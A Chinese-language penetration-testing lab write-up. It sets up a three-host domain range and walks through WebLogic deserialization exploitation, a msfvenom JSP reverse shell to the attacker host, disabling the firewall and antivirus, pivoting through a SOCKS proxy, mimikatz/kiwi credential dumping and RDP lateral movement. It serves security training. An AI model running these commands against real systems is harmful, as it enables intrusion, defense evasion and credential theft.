靶场搭建
靶场下载地址:漏洞详情
一共有三台主机:WEB、DC、PC
WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络
DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络
PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15
网络设置完成后进行开机
WEB主机以administrator第一次登录时没有密码,登录后会要求重新设置密码
其它两台主机默认登录密码为1qaz@WSX
WEB主机
PC主机
DC主机
KALI主机
DC: delay\delay 10.10.10.10
PC: delay\mssql 10.10.10.201 192.168.111.201
WEB:delay\Administrator 10.10.10.80 192.168.111.80
Kali: 192.168.111.136
WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行strartWebLogic.cmd
环境搭建完毕
渗透测试
首先用nmap扫描一下目标IP
nmap -sS -sV -Pn -T4 192.168.111.80
-sS代表使用半开式SYN扫描,这种扫描方式很少在目标主机上留下扫描日志
-sV代表版本探测,探测服务的版本
-Pn代表穿过防火墙扫描
-T4代表扫描时间间隔,设置速度等级,0-5级,数字越大,扫描时间间隔越小,速度就越快。(T0-T2串行扫描,T3-T5并行扫描)
445端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。
7001端口说明目标IP存在weblogic服务可能存在反序列化,SSRF,任意文件上传,后台路径泄露
开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞
放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。
开放3389端口,就存在远程桌面。
先看看weblogic是否存在漏洞
使用weblogicscan工具扫描
python WeblogicScan.py -u 192.168.111.80 -p 7001
两个工具扫描可以更准确地扫描出漏洞
扫描结果显示,存在两个CVE漏洞,都是反序列化,CVE-2017-3506、CVE-2019-2725
存在后台路径,还存在一个SSRF漏洞
开始利用
利用JAVA反序列化工具获得shell
msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.136 LPORT=4444 -f jsp > /root/test.jsp
上传木马
路径选择
1、把shell写到控制台images目录中
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马
访问
http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp
2、写到uddiexplorer目录中
\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp 目录写入木马
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp
访问
http://*.*.*.*:7001/uddiexplorer/shell.jsp
http://192.168.111.80:7001/uddiexplorer/shell.jsp
3:在应用安装目录中\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp 目录写入木马
访问 http://*.*.*.*:7001/项目名/shell.jsp
我这里选择第一种
访问木马文件
Matesploit开启监听,访问shell.jsp,获得回话,administrator权限
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
getsystem提权失败,应该是有杀软和防火墙的原因
查看补丁
乱码使用chcp 65001
ps查看进程,发现有某60
getpid查看进程号,这个进程号很容易被发现
进程迁移到system权限进程services
services.exe是微软windows操作系统的一部分。用于管理启动和停止服务
migrate 512
进程迁移后是system权限
netsh advfirewall set allprofiles state off 关闭防火墙
run killav 关闭杀软
内网渗透
ipconfig /all发现存在内网网段:10.10.10.0/24
run post/windows/gather/enum_domain 查看域控
run post/windows/gather/enum_ad_computers查看域内成员
新建路由
run post/multi/manage/autoroute
查看路由
run autoroute -p
background挂起会话
只增加route只能使用matesploit工具,要想使用其它工具就要建立反向代理
(正向代理就是指内网机器如果不能直接连到外网,建立正向代理可以连到外网,
而反向代理则相反,是外网主机想要进入内网建立的代理)
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 4a
exploit
执行之后后台会挂起一个jobs
使用命令jobs可以插查看
修改proxychains4.conf
vim /etc/proxychains4.conf
探测内网存活主机
use post/windows/gather/arp_scanner
扫描发现10.10.10.10主机,之前已经得知10.10.10.10时域控
发现主机10.10.10.201
net user /domain 查看域用户
load mimikatz 加载mimikatz
在新版msf中mimikatz已经被kiwi替代
load kiwi 加载kiwi
help kiwi 获取kiwi帮助信息
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
获取明文密码 load_all
使用nmap扫描端口开放(注意这里要加上proxychains,使用代理扫描)
proxychains nmap -sT -Pn -sV 10.10.10.10
-sT是指使用TCP扫描,这种方式会在目标主机中留下大量探测记录
可以使用-sS,使用半开放SYN扫描,这样就不会留下大量探测记录,但是这里用-sS会显示路由错误,探测不到10.10.10.10,用-sT就没问题,应该是因为目标主机开启了SYN攻击保护
proxychains nmap -sT -Pn -sV 10.10.10.10
proxychains nmap -sT -Pn -sV 10.10.10.201
横向移动
利用rdesktop(3389rdp远程连接)
rdesktop 192.168.111.80
账号和密码之前通过kiwi收集到了
因为其它两台主机都开启了3389,所以可以 以192.168.111.80作为跳板连接其它两台主机
